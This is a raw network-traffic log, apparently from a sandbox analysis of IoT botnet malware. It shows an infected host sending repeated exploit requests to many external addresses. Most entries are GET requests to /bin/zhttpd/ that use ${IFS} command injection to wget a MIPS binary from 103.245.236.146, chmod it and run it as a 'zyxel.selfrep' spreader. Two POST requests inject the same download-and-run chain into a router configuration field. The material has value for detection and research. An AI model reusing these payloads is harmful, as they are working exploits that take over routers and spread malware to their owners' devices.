                                                Jan 28, 2024 10:16:36.998213053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7569192.168.2.235622620.2.94.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.998233080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7570192.168.2.2355122195.30.22.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.998267889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7571192.168.2.2358568113.124.26.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.998287916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7572192.168.2.2351764206.222.121.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.998306036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7573192.168.2.235921257.233.175.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.998357058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7574192.168.2.2341232172.219.119.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.998394966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7575192.168.2.2355182122.86.159.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.998394966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7576192.168.2.2345926210.89.245.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.998440981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7577192.168.2.235638073.0.55.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.998445034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7578192.168.2.2334946130.215.130.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.998477936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7579192.168.2.234666863.250.237.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.998487949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7580192.168.2.2357260119.105.197.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.998509884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7581192.168.2.234298853.140.227.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.998513937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7582192.168.2.2357736104.214.12.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.998560905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7583192.168.2.2333090128.228.96.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.998594999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7584192.168.2.234657019.228.81.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.998630047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7585192.168.2.2345864169.100.156.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.998666048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7586192.168.2.2336796137.66.50.838080
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.368624926 CET245OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7587192.168.2.2356866111.89.143.1548080
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.538935900 CET245OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;
                                                Jan 28, 2024 10:16:37.812766075 CET404INHTTP/1.1 400 Bad Request
                                                Date: Sun, 28 Jan 2024 09:16:37 GMT
                                                Server: Apache
                                                Content-Length: 226
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7588192.168.2.233699899.6.43.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.993782997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7589192.168.2.234098247.24.201.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.993846893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7590192.168.2.2336618112.4.6.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.993879080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7591192.168.2.23461308.176.126.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.993879080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7592192.168.2.2350600180.59.102.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.993922949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7593192.168.2.2340614140.227.139.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.993942022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7594192.168.2.235074644.128.186.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.993966103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7595192.168.2.2333760118.35.82.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.994008064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7596192.168.2.2338934195.58.139.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.994014025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7597192.168.2.2360078111.95.226.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.994074106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7598192.168.2.234101236.161.154.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.994106054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7599192.168.2.233323251.26.5.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.994121075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7600192.168.2.234986842.246.189.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.994172096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7601192.168.2.2343972202.137.49.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.994204998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7602192.168.2.234631049.47.112.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.994237900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7603192.168.2.233326046.244.112.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.994244099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7604192.168.2.23533524.39.120.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.994265079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7605192.168.2.2343480164.243.93.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.994297028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7606192.168.2.2338704188.149.169.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.994324923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7607192.168.2.2350082219.70.110.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.994350910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7608192.168.2.2351216223.133.192.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.994364023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7609192.168.2.2340730208.109.194.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.994390011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7610192.168.2.2344430205.49.24.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.994441986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7611192.168.2.2360094197.202.250.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.994488955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7612192.168.2.2356924152.185.211.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.994497061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7613192.168.2.2339914119.105.178.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.994544029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7614192.168.2.235550635.148.204.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.994566917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7615192.168.2.2342038164.255.85.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.994577885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7616192.168.2.235507418.78.207.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.994617939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7617192.168.2.2343970129.5.86.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.994633913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7618192.168.2.233453420.54.168.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.994666100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7619192.168.2.2339526103.245.203.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.994693041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7620192.168.2.2355434156.254.2.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.994721889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7621192.168.2.2347402211.180.60.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.994745970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7622192.168.2.233399834.48.150.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.994769096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7623192.168.2.2341116174.131.154.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.994796038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


